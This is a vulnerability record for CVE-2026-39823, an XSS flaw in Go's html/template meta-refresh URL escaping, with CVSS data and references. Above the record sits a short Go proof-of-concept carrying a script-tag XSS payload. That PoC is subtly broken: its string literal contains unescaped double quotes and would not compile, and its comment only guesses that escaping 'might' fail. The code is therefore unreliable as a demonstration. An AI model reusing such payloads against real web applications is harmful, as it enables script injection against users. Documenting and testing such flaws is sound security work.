CVE-2026-39823

package main import ( "html/template" "os" ) func main() { // Simulate user input containing ASCII whitespace around '=' // This payload attempts to break out of the meta tag maliciousInput := "0; url=http://example.com ? x = "><script>alert(1)</script>" // Template rendering a meta tag with dynamic content tmpl := `<meta http-equiv="refresh" content="{{ . }}">` t := template.Must(template.New("test").Parse(tmpl)) // Execute template to demonstrate the vulnerability // In a vulnerable version, the script tag might not be escaped properly t.Execute(os.Stdout, maliciousInput) }

{"cve": {"id": "CVE-2026-39823", "sourceIdentifier": "[email protected]", "published": "2026-05-07T20:16:43.290", "lastModified": "2026-05-08T15:16:37.500", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "CVE-2026-27142 fixed a vulnerability in which URLs were not correctly escaped inside of a <meta> tag's <content> attribute. If the URL content were to insert ASCII whitespaces around the '=' rune inside of the <content> attribute, the escaper would fail to similarly escape it, leading to XSS."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "references": [{"url": "https://go.dev/cl/769920", "source": "[email protected]"}, {"url": "https://go.dev/issue/78913", "source": "[email protected]"}, {"url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M", "source": "[email protected]"}, {"url": "https://pkg.go.dev/vuln/GO-2026-4982", "source": "[email protected]"}]}}